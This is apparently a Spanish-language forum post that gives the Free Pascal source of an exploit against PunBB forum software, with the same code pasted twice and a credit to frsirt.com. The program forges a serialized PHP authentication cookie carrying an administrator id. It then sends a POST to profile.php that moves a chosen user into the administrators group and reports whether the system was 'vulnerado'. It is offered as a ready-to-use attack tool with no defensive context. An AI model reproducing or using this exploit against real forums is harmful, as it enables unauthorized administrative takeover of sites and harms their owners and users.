Autor
:Código:
// freepascal
program punbb;
uses winsock,sysutils,crt;
function conectar(var sock: TSocket; serv,port:string): byte;
var
host: phostent;
info: TSockAddrIn;
aux: pchar;
begin
aux:= stralloc(length(serv)+1);
strpcopy(aux,serv);
host:= gethostbyname(aux);
if host=nil then
begin
conectar:= 1;
Exit;
end;
sock:= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if sock=SOCKET_ERROR then
begin
conectar:= 2;
Exit;
end;
info.sin_addr:= PInAddr(host^.h_addr[0])^;
Write(' ip: ',inet_ntoa(info.sin_addr));
info.sin_family:= AF_INET;
info.sin_port:= htons(strtoint(port));
if connect(sock,info,SizeOf(TSockAddr))=SOCKET_ERROR then
conectar:= 3
else conectar:=0;
strdispose(aux);
end;
var
dato: wsadata;
misock: tsocket;
cok,cokh: string;
fpost,
post,
resp:pchar;
res: integer;
i: word;
activar: cardinal;
begin;
if paramcount<4 then
begin
WriteLn('- Faltan parametros');
WriteLn('- Uso: punbb <host> <ruta> <idadmin> <idusuario>');
WriteLn('- Ej.: punbb www.ejemplo.com /punbb/ 2 20');
Exit;
end;
wsastartup($0202,dato);
Write('- Conectando');
res:= conectar(misock,ParamStr(1),'80');
if res<>0 then
begin
if res=3 then closesocket(misock);
WriteLn(' > Error!');
end
else
begin
WriteLn(' > OK!');
cok:= 'a:2:{i:0;s:'+inttostr(length(ParamStr(3)))+':"'+ParamStr(3)+'";i:1;b:1;}';
cokh:= '';
for i:= length(cok) downto 1 do
cokh:='%'+inttohex(ord(cok[i]),2)+cokh;
post:= 'POST %sprofile.php?section=admin&id=%s&action=foo HTTP/1.0'+#10+
'Host: %s'+#10+
'Referer: http://%s%sprofile.php?section=admin&id=%s'+#10+
'Cookie: punbb_cookie=%s'+#10+
'Content-Type: application/x-www-form-urlencoded'+#10+
'Content-Length: 51'+#10+#10+
'form_sent=1&group_id=1&update_group_membership=Save'+#10+#10;
fpost:= stralloc(strlen(post)+1024);
strfmt(fpost,post,[ParamStr(2),ParamStr(4),ParamStr(1),
ParamStr(1),ParamStr(2),ParamStr(4),cokh]);
Write('- Enviando POST');
if send(misock,fpost^,strlen(fpost),0)=SOCKET_ERROR then WriteLn(' > Error!')
else
begin
WriteLn(' > OK!');
resp:= stralloc(2096);
WriteLn('- Esperando respuesta (presione cualquier tecla para cancelar)');
activar:= 1;
ioctlsocket(misock,FIONBIO,activar);
while (not keypressed) and ((recv(misock,resp^,4096,0)=SOCKET_ERROR) and (wsagetlasterror=WSAEWOULDBLOCK)) do;
if strpos(resp,'Group membership saved')<>nil then
WriteLn('- Sistema vulnerado!')
else
WriteLn('- No se pudo vulnerar el sistema!');
strdispose(resp);
end;//if send
strdispose(fpost);
end;//if conectar
wsacleanup;
end.
Fuente:program punbb;
uses winsock,sysutils,crt;
function conectar(var sock: TSocket; serv,port:string): byte;
var
host: phostent;
info: TSockAddrIn;
aux: pchar;
begin
aux:= stralloc(length(serv)+1);
strpcopy(aux,serv);
host:= gethostbyname(aux);
if host=nil then
begin
conectar:= 1;
Exit;
end;
sock:= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if sock=SOCKET_ERROR then
begin
conectar:= 2;
Exit;
end;
info.sin_addr:= PInAddr(host^.h_addr[0])^;
Write(' ip: ',inet_ntoa(info.sin_addr));
info.sin_family:= AF_INET;
info.sin_port:= htons(strtoint(port));
if connect(sock,info,SizeOf(TSockAddr))=SOCKET_ERROR then
conectar:= 3
else conectar:=0;
strdispose(aux);
end;
var
dato: wsadata;
misock: tsocket;
cok,cokh: string;
fpost,
post,
resp:pchar;
res: integer;
i: word;
activar: cardinal;
begin;
if paramcount<4 then
begin
WriteLn('- Faltan parametros');
WriteLn('- Uso: punbb <host> <ruta> <idadmin> <idusuario>');
WriteLn('- Ej.: punbb www.ejemplo.com /punbb/ 2 20');
Exit;
end;
wsastartup($0202,dato);
Write('- Conectando');
res:= conectar(misock,ParamStr(1),'80');
if res<>0 then
begin
if res=3 then closesocket(misock);
WriteLn(' > Error!');
end
else
begin
WriteLn(' > OK!');
cok:= 'a:2:{i:0;s:'+inttostr(length(ParamStr(3)))+':"'+ParamStr(3)+'";i:1;b:1;}';
cokh:= '';
for i:= length(cok) downto 1 do
cokh:='%'+inttohex(ord(cok[i]),2)+cokh;
post:= 'POST %sprofile.php?section=admin&id=%s&action=foo HTTP/1.0'+#10+
'Host: %s'+#10+
'Referer: http://%s%sprofile.php?section=admin&id=%s'+#10+
'Cookie: punbb_cookie=%s'+#10+
'Content-Type: application/x-www-form-urlencoded'+#10+
'Content-Length: 51'+#10+#10+
'form_sent=1&group_id=1&update_group_membership=Save'+#10+#10;
fpost:= stralloc(strlen(post)+1024);
strfmt(fpost,post,[ParamStr(2),ParamStr(4),ParamStr(1),
ParamStr(1),ParamStr(2),ParamStr(4),cokh]);
Write('- Enviando POST');
if send(misock,fpost^,strlen(fpost),0)=SOCKET_ERROR then WriteLn(' > Error!')
else
begin
WriteLn(' > OK!');
resp:= stralloc(2096);
WriteLn('- Esperando respuesta (presione cualquier tecla para cancelar)');
activar:= 1;
ioctlsocket(misock,FIONBIO,activar);
while (not keypressed) and ((recv(misock,resp^,4096,0)=SOCKET_ERROR) and (wsagetlasterror=WSAEWOULDBLOCK)) do;
if strpos(resp,'Group membership saved')<>nil then
WriteLn('- Sistema vulnerado!')
else
WriteLn('- No se pudo vulnerar el sistema!');
strdispose(resp);
end;//if send
strdispose(fpost);
end;//if conectar
wsacleanup;
end.
http://www.frsirt.com. bytes
En línea
